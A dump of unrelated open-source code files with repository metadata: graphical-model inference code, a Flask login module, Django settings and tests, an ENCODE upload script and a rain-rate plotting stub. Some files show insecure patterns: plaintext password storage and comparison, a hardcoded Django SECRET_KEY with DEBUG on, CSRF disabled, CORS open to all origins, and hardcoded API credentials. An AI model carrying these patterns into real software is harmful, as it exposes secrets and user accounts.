avars = typ.embedded_vars(a)
bvars = typ.embedded_vars(b)
assert len(avars) == len(bvars)
for av, bv in zip(avars, bvars):
self.unify_vars(av, bv)
return a
def new_factor(self, fac_info, args):
facid = len(self.factors)
self.factors.append((fac_info, map(self.resolve_var, args)))
return FactorId(self, facid)
def new_rand_fun(self, arg_exp_fams, res_exp_fam):
rfid = len(self.rand_funs)
self.rand_funs.append((arg_exp_fams, res_exp_fam))
return RandFunId(self, rfid)
def new_sample_from_rand_fun(self, rfid, arg_vars):
(arg_exp_fams, res_exp_fam) = self.rand_funs[rfid.id]
assert len(arg_exp_fams) == len(arg_vars)
v = self.new_var(res_exp_fam)
fac = self.new_factor({'type': 'randFun', 'id': rfid.id}, [v] + arg_vars)
return v
def new_const_factor(self, varid, value):
varid = self.resolve_var(varid)
ef = self.vars[varid.id]
return self.new_factor({'type': 'constant', 'expFam': ef, 'value': value}, [varid])
def new_const_var(self, ef, value):
varid = self.new_var(ef)
fac = self.new_const_factor(varid, value)
return varid
def rand_function(self, arg_types, res_type):
arg_tuple_type = Tuple(*arg_types)
rfids = [self.new_rand_fun(arg_tuple_type.exp_fams(), ef) for ef in res_type.exp_fams()]
def rf(*args):
assert len(args) == len(arg_types)
arg_vars = arg_tuple_type.embedded_vars(tuple(args))
res_vars = [self.new_sample_from_rand_fun(rfid, arg_vars) for rfid in rfids]
return res_type.vars_to_value(Queue(res_vars))
return rf
def to_JSON(self):
def replace_id(varid):
if varid.id in self.var_replacements:
return self.var_replacements[varid.id].id
else:
return varid.id
return {
'vars': [[varid, expfam] for (varid, expfam) in self.vars.items()],
'randFuns': [{'argExpFams': aefs, 'resExpFam': ref} for (aefs, ref) in self.rand_funs],
'factors': [{'factor': facinfo, 'argVarIds': [replace_id(a) for a in args]} for (facinfo, args) in self.factors]
}
"""
Type interface:
t.exp_fams()
Returns a list of exponential family names
t.embedded_vars(value)
Returns a list of var ids in value
t.vars_to_value(vars)
Given a queue of var ids, create a value
t.unfreeze(state, value)
Unfreezes a frozen value
"""
class DoubleValue(object):
def __init__(self, varid):
self.varid = varid
def get_type(self):
return Double
def freeze(self, varvals):
return varvals[self.varid.id]['value']
gaussian_exp_fam = {'type': 'gaussian'}
bernoulli_exp_fam = {'type': 'bernoulli'}
def categorical_exp_fam(n):
return {'type': 'categorical', 'n': n}
class DoubleClass(object):
def exp_fams(self):
return [gaussian_exp_fam]
def embedded_vars(self, value):
return [value.varid]
def vars_to_value(self, vars):
return DoubleValue(vars.dequeue())
def unfreeze(self, state, value):
return DoubleValue(state.new_const_var(gaussian_exp_fam, value))
def __repr__(self):
return 'Double'
Double = DoubleClass()
class BoolValue(object):
def __init__(self, varid):
self.varid = varid
def get_type(self):
return Bool
def freeze(self, varvals):
return varvals[self.varid.id]['value']
class BoolClass(object):
def exp_fams(self):
return [bernoulli_exp_fam]
def embedded_vars(self, value):
return [value.varid]
def vars_to_value(self, vars):
return BoolValue(vars.dequeue())
def unfreeze(self, state, value):
return BoolValue(state.new_const_var(bernoulli_exp_fam, value))
def __repr__(self):
return 'Bool'
Bool = BoolClass()
# class TupleValue(object):
#
# def __init__(self, fields):
# self.fields = tuple(fields)
class Tuple(object):
def __init__(self, *types):
self.types = types
def exp_fams(self):
ef = []
for t in self.types:
ef.extend(t.exp_fams())
return ef
def embedded_vars(self, value):
vs = []
for (t, v) in zip(self.types, value):
vs.extend(t.embedded_vars(v))
return vs
def vars_to_value(self, vars):
val = []
for t in self.types:
val.append(t.vars_to_value(vars))
return tuple(val)
def freeze(self, varvals, value):
return tuple([t.freeze(varvals, x) for (t, x) in zip(self.types, value)])
def unfreeze(self, state, value):
return tuple([t.unfreeze(state, v) for (t, v) in zip(self.types, value)])
def __repr__(self):
return repr(self.types)
class CategoricalValue(object):
def __init__(self, varid, n):
self.varid = varid
self.n = n
def get_type(self):
return Categorical(self.n)
def freeze(self, varvals):
return varvals[self.varid.id]['value']
class Categorical(object):
def __init__(self, n):
self.n = n
def exp_fams(self):
return [categorical_exp_fam(self.n)]
def embedded_vars(self, value):
return [value.varid]
def vars_to_value(self, vars):
return CategoricalValue(vars.dequeue(), self.n)
def unfreeze(self, state, value):
return CategoricalValue(state.new_const_var(categorical_exp_fam(self.n), value), self.n)
def __repr__(self):
return 'Categorical(' + str(self.n) + ')'
def get_type(value):
if hasattr(value, 'get_type'):
return value.get_type()
elif isinstance(value, (tuple, list)):
return Tuple(*map(get_type, value))
else:
raise Exception('Unknown value type ' + str(type(value)) + ', value ' + str(value))
def freeze_value(value, varvals):
if hasattr(value, 'freeze'):
return value.freeze(varvals)
elif isinstance(value, (tuple, list)):
return tuple([freeze_value(v, varvals) for v in value])
else:
raise Exception('Unknown value type ' + str(type(value)) + ', value ' + str(value))
def Vector(n, typ):
print 'vector', n, typ, Tuple(*([typ]*n))
return Tuple(*([typ]*n))
Unit = Tuple()
current_graph_state = GraphState()
def rand_function(*ts):
return current_graph_state.rand_function(ts[:-1], ts[-1])
def uniform_categorical(n):
v = current_graph_state.new_var(categorical_exp_fam(n))
current_graph_state.new_factor({'type': 'uniformCategorical', 'n': n}, [v])
return CategoricalValue(v, n)
def normal(mean, stdev):
v = current_graph_state.new_var(gaussian_exp_fam)
current_graph_state.new_factor({'type': 'normal', 'mean': mean, 'stdev': stdev}, [v])
return DoubleValue(v)
def conditioned_network(state, typ, sampler, frozen_samps):
samples = [sampler() for i in range(len(samps))]
for (latent, s), fs in zip(samples, frozen_samps):
unfrozen = typ.unfreeze(fs)
state.unify_values(get_type(s), s, unfrozen)
return [latent for (latent, _) in samples]
def condition_on_frozen_samples(graph_state, samples, frozen_samples):
for s,f in zip(samples, frozen_samples):
typ = get_type(s[1])
graph_state.unify_values(typ, s[1], typ.unfreeze(graph_state, f))
return graph_state.to_JSON()
def infer_states_and_parameters(templ):
(state, params) = hs_init_em(templ)
state = hs_infer_state(templ, state, params)
score = hs_score(templ, state, params)
yield (state, params, score)
i = 0
while True:
print 'iter', i
params = hs_infer_params(templ, state, params)
state = hs_infer_state(templ, state, params)
score = hs_score(templ, state, params)
yield (state, params, score)
i += 1
def translate_params_for_fn(params):
if len(params[1][0]) == 0:
probs = [math.exp(x) for x in [0.0] + params[0]]
sum_probs = sum(probs)
return [p/sum_probs for p in probs]
else:
variance = -1.0 / (2 * params[0][1])
factors = [params[0][0]] + params[1][0]
return (variance, [f*variance for f in factors])
def params_to_cluster_centers(params):
d = dict(params)
cluster_centers = []
for i in d:
ps = d[i]
variance = -1.0 / (2 * ps[0][1])
factors = [ps[0][0]] + ps[1][0]
scaled_factors = [f*variance for f in factors]
centers = [scaled_factors[0]] + [x + scaled_factors[0] for x in scaled_factors[1:]]
cluster_centers.append(centers)
return zip(*cluster_centers)
def cluster_centers_error(cs1, cs2):
errs = []
def tup_dist(t1, t2):
return sum((a-b)**2 for (a, b) in zip(t1, t2))
for cs in itertools.permutations(cs1):
errs.append(sum(map(tup_dist, cs, cs2)))
return min(errs)
def cluster_assignment_accuracy(cs1, cs2):
accuracies = []
for perm in itertools.permutations(range(3)):
accuracies.append(float(len([() for (a, b) in zip(cs1, cs2) if a == perm[b]])) / len(cs1))
return max(accuracies)
def translate_params(params):
return [(x, translate_params_for_fn(y)) for (x, y) in params]
def mean(xs):
return sum(xs) / len(xs)
def run_clustering_example(run):
global current_graph_state
n = 100
accs = []
for i in range(100):
current_graph_state = GraphState()
sampler = run()
samples = [sampler() for i in range(n)]
templ = current_graph_state.to_JSON()
rand_params = hs_rand_template_params(templ)
print hs_sample_bayes_net(templ, rand_params)
varvals = state_to_varvals(hs_sample_bayes_net(templ, rand_params))
frozen_samples = [freeze_value(samp, varvals) for samp in samples]
true_latents = [x[0] for x in frozen_samples]
print true_latents
templ = condition_on_frozen_samples(current_graph_state, samples, [x[1] for x in frozen_samples])
print 'best score', params_score(templ, rand_params)
state_params_list = infer_states_and_parameters(templ)
rand_cs = params_to_cluster_centers(rand_params)
iter_accs = []
j = 0
for (state, params, score) in state_params_list:
print 'score', score
cs = params_to_cluster_centers(params)
# if j > 1:
# varvals = state_to_varvals(state)
# state_latents = [freeze_value(samp[0], varvals) for samp in samples]
# acc = cluster_assignment_accuracy(true_latents, state_latents)
# iter_accs.append(acc)
j += 1
accs.append(iter_accs)
print map(mean, zip(*accs))
def params_to_matrix(params):
coords = []
component_variances = []
for (i, ((base_n1, n2), (lin,))) in params:
component_variances.append(-1.0 / (2 * n2))
coords.append([-l/(2 * n2) for l in [base_n1] + lin])
return component_variances, np.matrix(coords)
def matrix_to_gaussian(variances_mat):
variances, mat = variances_mat
mean = mat[:,0]
a = mat[:, 1:]
return (mean, a * a.T + np.diag(variances))
def gaussian_kl(p, q):
(pm, pv) = p
(qm, qv) = q
n = pm.shape[0]
assert pv.shape[0] == n == qv.shape[0]
return 0.5 * (np.trace(linalg.inv(qv) * pv) + ((qm - pm).T * linalg.inv(qv) * (qm - pm)).item((0,0)) - n + linalg.slogdet(qv)[1] - linalg.slogdet(pv)[1])
def rotation_invariant_dist(A, B):
# min_R ||AR - B||^2
# = min_R tr((AR - B)^T(AR - B))
# = min_R tr(R^TA^T A R - B^T A R - R^T A^T B + B^T B)
# = ||A||^2 + ||B||^2 - 2 max_R tr(R^T A^T B)
#
# A^T B = USV^T
#
# = ||A||^2 + ||B||^2 - 2 max_R tr(R^T USV^T)
# = ||A||^2 + ||B||^2 - 2 max_R tr(V^T R^T US)
# = ||A||^2 + ||B||^2 - 2 max_R tr(S)
# -> R = UV^T
u, s, v = linalg.svd(A.T * B)
r = u * v
# print linalg.norm(A*r - B)**2
return (r, linalg.norm(A)**2 + linalg.norm(B)**2 - 2 * sum(s))
# IDEA: compute Gaussian from factors, KL divergence!
def params_score(templ, params):
(state, _) = hs_init_em(templ)
state = hs_infer_state(templ, state, params, iters=10)
return hs_score(templ, state, params)
def run_factor_analysis_example(run):
global current_graph_state
n = 200
accs = []
for i in range(1):
current_graph_state = GraphState()
sampler = run()
samples = [sampler() for i in range(n)]
templ = current_graph_state.to_JSON()
rand_params = hs_rand_template_params(templ)
rand_mat = params_to_matrix(rand_params)
print rand_mat
varvals = state_to_varvals(hs_sample_bayes_net(templ, rand_params))
frozen_samples = [freeze_value(samp, varvals) for samp in samples]
true_latents = [x[0] for x in frozen_samples]
# print true_latents
templ = condition_on_frozen_samples(current_graph_state, samples, [x[1] for x in frozen_samples])
print 'best score', params_score(templ, rand_params)
state_params_list = infer_states_and_parameters(templ)
# rand_cs = params_to_cluster_centers(rand_params)
iter_accs = []
j = 0
for (state, params, score) in state_params_list:
print 'score', score
guess_mat = params_to_matrix(params)
# cs = params_to_cluster_centers(params)
if j > 1:
print guess_mat
print 'kl', gaussian_kl(matrix_to_gaussian(rand_mat), matrix_to_gaussian(guess_mat))
print 'rid', rotation_invariant_dist(rand_mat[1], guess_mat[1])
j += 1
# accs.append(iter_accs)
# print map(mean, zip(*accs))
def get_transition_matrix(params):
base, mat = params
rows = []
for i in range(1 + len(mat[0])):
if i == 0:
logodds = [0.0] + base
else:
logodds = [0.0] + [b + m[i-1] for (b,m) in zip(base, mat)]
probs = list(map(math.exp, logodds))
sum_probs = sum(probs)
rows.append([p / sum_probs for p in probs])
return rows
def hmm_parameters(params):
return (get_transition_matrix(params[0][1]), get_transition_matrix(params[1][1]))
def matrix_dist(m1, m2):
return linalg.norm(np.matrix(m1) - np.matrix(m2))**2
def permute_rows(perm, mat):
return [mat[i] for i in perm]
def permute_cols(perm, mat):
return [[r[i] for i in perm] for r in mat]
def hmm_parameters_dist(tms1, tms2):
(tm1, om1) = tms1
(tm2, om2) = tms2
perms_and_dists = []
for perm in itertools.permutations(range(len(tm1))):
tm2p = permute_rows(perm, permute_cols(perm, tm2))
om2p = permute_rows(perm, om2)
perms_and_dists.append((perm, matrix_dist(tm1, tm2p) + matrix_dist(om1, om2p)))
return min(perms_and_dists, key=lambda x: x[1])
def run_hmm_example(run):
global current_graph_state
n = 100
accs = []
for i in range(1):
current_graph_state = GraphState()
sampler = run()
samples = [sampler() for i in range(n)]
templ = current_graph_state.to_JSON()
rand_params = hs_rand_template_params(templ)
rand_hmm = hmm_parameters(rand_params)
print rand_hmm
# rand_mat = params_to_matrix(rand_params)
varvals = state_to_varvals(hs_sample_bayes_net(templ, rand_params))
frozen_samples = [freeze_value(samp, varvals) for samp in samples]
true_latents = [x[0] for x in frozen_samples]
# print true_latents
templ = condition_on_frozen_samples(current_graph_state, samples, [x[1] for x in frozen_samples])
print 'best score', params_score(templ, rand_params)
state_params_list = infer_states_and_parameters(templ)
# rand_cs = params_to_cluster_centers(rand_params)
iter_accs = []
j = 0
prev_state_latents = None
for (state, params, score) in state_params_list:
print 'score', score
# guess_mat = params_to_matrix(params)
# cs = params_to_cluster_centers(params)
if j > 1:
inferred_hmm = hmm_parameters(params)
print inferred_hmm
print hmm_parameters_dist(rand_hmm, inferred_hmm)
varvals = state_to_varvals(state)
state_latents = [freeze_value(samp[0], varvals) for samp in samples]
prev_state_latents = state_latents
j += 1
# accs.append(iter_accs)
# print map(mean, zip(*accs))
|
mit
| 7,413,421,166,586,676,000
| 28.176883
| 155
| 0.635954
| false
| 2.904969
| false
| false
| false
|
agilman/flask-template
|
app/auth.py
|
1
|
1738
|
from flask import session, redirect, request, render_template
from app import app
from app.models import *
def getUserFromDb(username,password):
userQuery = Users.query.filter_by(username=username)
if userQuery.count()==0:
return "No such user"
else:
usr = userQuery.first()
if usr.passwordHash==password:
return usr
else:
return "Login failed"
@app.route("/auth/login",methods=["GET","POST"])
def login():
form = request.form
if request.method=="POST":
username = form["username"]
password = form["password"]
dbUser = getUserFromDb(username,password)
if type(dbUser) is str:
return "MSG : BAD LOG IN"
session['userName']=username
session['userId']=dbUser.id
return redirect("/users/"+username)
else:
return render_template("login.html")
@app.route("/auth/register",methods=["GET","POST"])
def register(username=None):
form = request.form
#TODO:
#Make sure unique constraint is satisfied before trying to add to db
if request.method=="POST":
username = form["username"]
password = form["password"]
email = form["email"]
user = Users(username=username, email=email, password=password)
db.session.add(user)
db.session.commit()
session['userName'] = username
session['userId'] = user.id
return redirect("/users/"+username)
else:
return render_template("register.html")
@app.route("/auth/logout")
def logout():
session.pop('userName', None)
session.pop('userId', None)
session.clear()
return redirect("/")
|
mit
| -1,983,810,625,785,931,800
| 25.738462
| 72
| 0.600115
| false
| 4.157895
| false
| false
| false
|
NoneGroupTeam/Let-s-Go
|
webapp/webapp/settings.py
|
1
|
3246
|
"""
Django settings for webapp project.
Generated by 'django-admin startproject' using Django 1.9.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fopfdg5g999+e8&sk39q(%unup0d_b_e#p$jeq#qhw27d=v0#t'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost',
'127.0.0.1',
'none.lc4t.me',
'letsgo.lc4t.me'
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'corsheaders',
]
MIDDLEWARE_CLASSES = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
# 'corsheaders.middleware.CorsPostCsrfMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True
SESSION_COOKIE_DOMAIN = 'localhost'
# SESSION_COOKIE_HTTPONLY = False
ROOT_URLCONF = 'webapp.urls'
AUTH_USER_MODEL = "app.AppUser"
# AUTH_PROFILE_MODULE = 'app.Profile'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'webapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite3'
},
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'zh-Hans'
TIME_ZONE = 'Asia/Chongqing'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
TEST_RUNNER = 'webapp.runner.PytestTestRunner'
|
gpl-3.0
| 7,738,174,100,558,951,000
| 27.725664
| 78
| 0.687616
| false
| 3.453191
| false
| false
| false
|
ENCODE-DCC/pyencoded-tools
|
permissions_qa_scripts/originals/UPLOADS/submit.bam.py
|
1
|
4935
|
""" Example file submission script
Requires the `aws` command line utility: http://aws.amazon.com/cli/
"""
import hashlib
import json
import os
import requests
import subprocess
import sys
import time
host = 'REPLACEME'
encoded_access_key = 'UISQC32B'
encoded_secret_access_key = 'ikc2wbs27minvwo4'
path = 'test.bam'
my_lab = '/labs/thomas-gingeras/'
my_award = '/awards/U54HG004557/'
# From http://hgwdev.cse.ucsc.edu/~galt/encode3/validatePackage/validateEncode3-latest.tgz
encValData = 'encValData'
assembly = 'hg19'
# ~2s/GB
print("Calculating md5sum.")
md5sum = hashlib.md5()
with open(path, 'rb') as f:
for chunk in iter(lambda: f.read(1024*1024), b''):
md5sum.update(chunk)
data = {
"dataset": "TSTNEW",
"file_format": "bam",
"file_size": os.path.getsize(path),
"assembly": "hg19",
"md5sum": md5sum.hexdigest(),
"output_type": "alignments",
"submitted_file_name": path,
"lab": my_lab,
"award": my_award,
}
####################
# Local validation
gzip_types = [
"CEL",
"bam",
"bed",
"csfasta",
"csqual",
"fasta",
"fastq",
"gff",
"gtf",
"tar",
"sam",
"wig"
]
magic_number = open(path, 'rb').read(2)
is_gzipped = magic_number == b'\x1f\x8b'
if data['file_format'] in gzip_types:
assert is_gzipped, 'Expected gzipped file'
else:
assert not is_gzipped, 'Expected un-gzipped file'
chromInfo = '-chromInfo=%s/%s/chrom.sizes' % (encValData, assembly)
validate_map = {
('bam', None): ['-type=bam', chromInfo],
('bed', 'unknown'): ['-type=bed6+', chromInfo], # if this fails we will drop to bed3+
('bigBed', 'bedLogR'): ['-type=bigBed9+1', chromInfo, '-as=%s/as/bedLogR.as' % encValData],
('bed', 'bedLogR'): ['-type=bed9+1', chromInfo, '-as=%s/as/bedLogR.as' % encValData],
('bigBed', 'bedMethyl'): ['-type=bigBed9+2', chromInfo, '-as=%s/as/bedMethyl.as' % encValData],
('bed', 'bedMethyl'): ['-type=bed9+2', chromInfo, '-as=%s/as/bedMethyl.as' % encValData],
('bigBed', 'unknown'): ['-type=bigBed6+', chromInfo], # if this fails we will drop to bigBed3+
('bigWig', None): ['-type=bigWig', chromInfo],
('bigBed', 'broadPeak'): ['-type=bigBed6+3', chromInfo, '-as=%s/as/broadPeak.as' % encValData],
('bed', 'broadPeak'): ['-type=bed6+3', chromInfo, '-as=%s/as/broadPeak.as' % encValData],
('fasta', None): ['-type=fasta'],
('fastq', None): ['-type=fastq'],
('bigBed', 'gappedPeak'): ['-type=bigBed12+3', chromInfo, '-as=%s/as/gappedPeak.as' % encValData],
('bed', 'gappedPeak'): ['-type=bed12+3', chromInfo, '-as=%s/as/gappedPeak.as' % encValData],
('gtf', None): None,
('idat', None): ['-type=idat'],
('bigBed', 'narrowPeak'): ['-type=bigBed6+4', chromInfo, '-as=%s/as/narrowPeak.as' % encValData],
('bed', 'narrowPeak'): ['-type=bed6+4', chromInfo, '-as=%s/as/narrowPeak.as' % encValData],
('rcc', None): ['-type=rcc'],
('tar', None): None,
('tsv', None): None,
('csv', None): None,
('2bit', None): None,
('csfasta', None): ['-type=csfasta'],
('csqual', None): ['-type=csqual'],
('bigBed', 'bedRnaElements'): ['-type=bed6+3', chromInfo, '-as=%s/as/bedRnaElements.as' % encValData],
('CEL', None): None,
('sam', None): None,
('wig', None): None,
('hdf5', None): None,
('gff', None): None
}
validate_args = validate_map.get((data['file_format'], data.get('file_format_type')))
if validate_args is not None:
print("Validating file.")
try:
subprocess.check_output(['validateFiles'] + validate_args + [path])
except subprocess.CalledProcessError as e:
print(e.output)
raise
####################
# POST metadata
headers = {
'Content-type': 'application/json',
'Accept': 'application/json',
}
print("Submitting metadata.")
r = requests.post(
host + '/file',
auth=(encoded_access_key, encoded_secret_access_key),
data=json.dumps(data),
headers=headers,
)
try:
r.raise_for_status()
except:
print('Submission failed: %s %s' % (r.status_code, r.reason))
print(r.text)
raise
item = r.json()['@graph'][0]
print(json.dumps(item, indent=4, sort_keys=True))
####################
# POST file to S3
creds = item['upload_credentials']
env = os.environ.copy()
env.update({
'AWS_ACCESS_KEY_ID': creds['access_key'],
'AWS_SECRET_ACCESS_KEY': creds['secret_key'],
'AWS_SECURITY_TOKEN': creds['session_token'],
})
# ~10s/GB from Stanford - AWS Oregon
# ~12-15s/GB from AWS Ireland - AWS Oregon
print("Uploading file.")
start = time.time()
try:
subprocess.check_call(['aws', 's3', 'cp', path, creds['upload_url']], env=env)
except subprocess.CalledProcessError as e:
# The aws command returns a non-zero exit code on error.
print("Upload failed with exit code %d" % e.returncode)
sys.exit(e.returncode)
else:
end = time.time()
duration = end - start
print("Uploaded in %.2f seconds" % duration)
|
mit
| 467,417,177,298,291,700
| 29.091463
| 106
| 0.611145
| false
| 2.867519
| false
| false
| false
|
novafloss/django-agnocomplete
|
demo/tests/test_errors.py
|
1
|
4942
|
from django.test import TestCase
from django.urls import reverse
from django.test import override_settings
from django.core.exceptions import SuspiciousOperation
import mock
from requests.exceptions import Timeout
from agnocomplete import get_namespace
from . import get_json
from . import LoaddataLiveTestCase
from ..autocomplete import (
# Classic search
AutocompletePerson,
# URL Proxies
AutocompleteUrlSimpleAuth,
AutocompleteUrlHeadersAuth,
)
def raise_standard_exception(*args, **kwargs):
raise Exception("Nothing exceptional")
def raise_suspiciousoperation(*args, **kwargs):
raise SuspiciousOperation("You are not allowed to do this")
def raise_timeout(*args, **kwargs):
raise Timeout("Timeout")
class ErrorHandlingTest(object):
expected_status = 500
@property
def klass(self):
raise NotImplementedError("You need a `klass` property")
@property
def mock_function(self):
raise NotImplementedError("You need a `mock_function` property")
@property
def klass_path(self):
return '{}.{}'.format(self.klass.__module__, self.klass.__name__)
@property
def mock_path(self):
paths = [self.klass_path, 'items']
return ".".join(paths)
@property
def url(self):
ac_url_name = get_namespace() + ':agnocomplete'
return reverse(ac_url_name, args=[self.klass.__name__])
def test_errors(self):
with mock.patch(self.mock_path, self.mock_function):
response = self.client.get(
self.url,
data={"q": "nothing important"})
self.assertEqual(response.status_code, self.expected_status)
data = get_json(response, 'errors')
self.assertEqual(len(data), 1)
class ErrorHandlingAutocompletePersonTest(ErrorHandlingTest, TestCase):
klass = AutocompletePerson
mock_function = raise_standard_exception
class ErrorHandlingSuspiciousOperationTest(ErrorHandlingTest, TestCase):
klass = AutocompletePerson
mock_function = raise_suspiciousoperation
expected_status = 400
@override_settings(HTTP_HOST='')
class ErrorHandlingURLProxySimpleAuthTest(
ErrorHandlingTest, LoaddataLiveTestCase):
klass = AutocompleteUrlSimpleAuth
mock_function = raise_standard_exception
def test_search_query_wrong_auth(self):
# URL construct
instance = self.klass()
search_url = instance.search_url
klass = self.klass_path
with mock.patch(klass + '.get_search_url') as mock_auto:
mock_auto.return_value = self.live_server_url + search_url
# Search using the URL proxy view
search_url = get_namespace() + ':agnocomplete'
with mock.patch(klass + '.get_http_call_kwargs') as mock_headers:
mock_headers.return_value = {
'auth_token': 'BADAUTHTOKEN',
'q': 'person',
}
response = self.client.get(
reverse(
search_url, args=[self.klass.__name__]),
data={'q': "person"}
)
self.assertEqual(response.status_code, 403)
@override_settings(HTTP_HOST='')
class ErrorHandlingURLProxyHeadersAuthTest(
ErrorHandlingTest, LoaddataLiveTestCase):
klass = AutocompleteUrlHeadersAuth
mock_function = raise_standard_exception
def test_search_headers_wrong_auth(self):
# URL construct
instance = self.klass()
search_url = instance.search_url
klass = self.klass_path
with mock.patch(klass + '.get_search_url') as mock_auto:
mock_auto.return_value = self.live_server_url + search_url
# Search using the URL proxy view
search_url = get_namespace() + ':agnocomplete'
with mock.patch(klass + '.get_http_headers') as mock_headers:
mock_headers.return_value = {
'NOTHING': 'HERE'
}
response = self.client.get(
reverse(
search_url, args=[self.klass.__name__]),
data={'q': "person"}
)
self.assertEqual(response.status_code, 403)
@override_settings(HTTP_HOST='')
class ErrorHandlingURLProxyTimeoutTest(LoaddataLiveTestCase):
klass = AutocompleteUrlHeadersAuth
@property
def klass_path(self):
return '{}.{}'.format(self.klass.__module__, self.klass.__name__)
def test_timeout(self):
# Search using the URL proxy view
search_url = get_namespace() + ':agnocomplete'
with mock.patch('requests.get', raise_timeout):
response = self.client.get(
reverse(
search_url, args=[self.klass.__name__]),
data={'q': "person"}
)
self.assertEqual(response.status_code, 408)
|
mit
| 7,850,101,734,890,066,000
| 31.300654
| 77
| 0.616754
| false
| 4.223932
| true
| false
| false
|
gabinetedigital/videre
|
videos/models.py
|
1
|
2845
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Governo do Estado do Rio Grande do Sul
# Copyright (C) 2011 Lincoln de Sousa <lincoln@comum.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Tag(models.Model):
name = models.CharField(_(u'name'), max_length=300)
def __unicode__(self):
return self.name
class Url(models.Model):
url = models.CharField(_(u'url'), max_length=300)
content_type = models.CharField(_(u'content type'), max_length=128)
video = models.ForeignKey('Video', verbose_name=_(u'video'))
def __unicode__(self):
return self.url
class Video(models.Model):
title = models.CharField(_(u'title'), max_length=200)
creation_date = models.DateTimeField(
_(u'creation date'), default=datetime.now)
event_date = models.DateTimeField(_(u'event date'), blank=True, null=True)
summary = models.TextField(_(u'summary'),)
author = models.CharField(_(u'author'), max_length=200)
license_name = models.CharField(_(u'license name'), max_length=200)
license_link = models.CharField(_(u'license link'), max_length=300)
thumb_url = models.CharField(_(u'thumb url'), max_length=300, blank=True)
tags = models.ManyToManyField('Tag', verbose_name=_(u'tags'),)
def __unicode__(self):
return self.title
def as_dict(self):
""" Returns a dictionary representation of a video object """
date_handler = lambda x: getattr(x, 'isoformat', lambda:None)()
return {
'id': self.id,
'title': self.title,
'creation_date': date_handler(self.creation_date),
'event_date': date_handler(self.event_date),
'summary': self.summary,
'author': self.author,
'license_name': self.license_name,
'license_link': self.license_link,
'thumb_url': self.thumb_url,
'tags': list(self.tags.values_list('name', flat=True)),
'sources': [{
'url': i.url,
'content_type': i.content_type,
} for i in self.url_set.all()],
}
|
agpl-3.0
| 8,764,051,673,740,353,000
| 38.513889
| 78
| 0.643234
| false
| 3.808568
| false
| false
| false
|
pacificgilly1992/PGrainrate
|
Backups/Externals/externals1.0.5.py
|
1
|
4428
|
############################################################################
# Project: The Lenard effect of preciptation at the RUAO,
# Title: Ensemble processing of the PG, Time and Rain Rate data,
# Author: James Gilmore,
# Email: james.gilmore@pgr.reading.ac.uk.
# Version: 1.0.5
# Date: 07/12/15
############################################################################
#Initialising the python script
from __future__ import absolute_import, division, print_function
import matplotlib.pyplot as plt
import numpy as np
from lowess import lowess
import sys
############################################################################
#Plotting functions for PG and Rain Rate
def PGRainFull(xlimmax=None, ylimmax=None, outFile=None, fileformat=None, RainRate5mm=None, TimeTip5mm=None, timekeep=None, PG=None, PGtip=None, slope=None, intercept=None, p_value=None, r_value=None, pearson_cor=None, std_err=None, mann_wht=None):
"Plot 3 subplots all of which completment the main focus, i.e. (1) PG vs."
"Rain Rate along with side plots for (2) Rain Rate and (3) PG between the"
"times that charged rain was detected. Statistical information was also "
"added in the remaining quadrant to fill the white space but can easily "
"be removed if neseccary."
plt.clf()
fig = plt.figure()
#plt.suptitle("Raindrop Charge: " + outFile)
pgrain = fig.add_subplot(222)
pgrain.scatter(RainRate5mm, PGtip)
pgrain.set_xlabel("Rain Rate (mm/hr)")
pgrain.set_ylabel("Potential Gradient (V/m)")
pgrain.grid()
pgrain.set_xlim(-.1,xlimmax)
pgrain.set_ylim(-1050, ylimmax)
pgrain.invert_yaxis()
pgrain.plot(np.arange(-.1, xlimmax+0.3, 0.2),np.arange(-.1, xlimmax+0.3, 0.2)*slope+intercept)
PGRainsort = np.array(sorted(zip(RainRate5mm, PGtip)))
eps = sys.float_info.epsilon
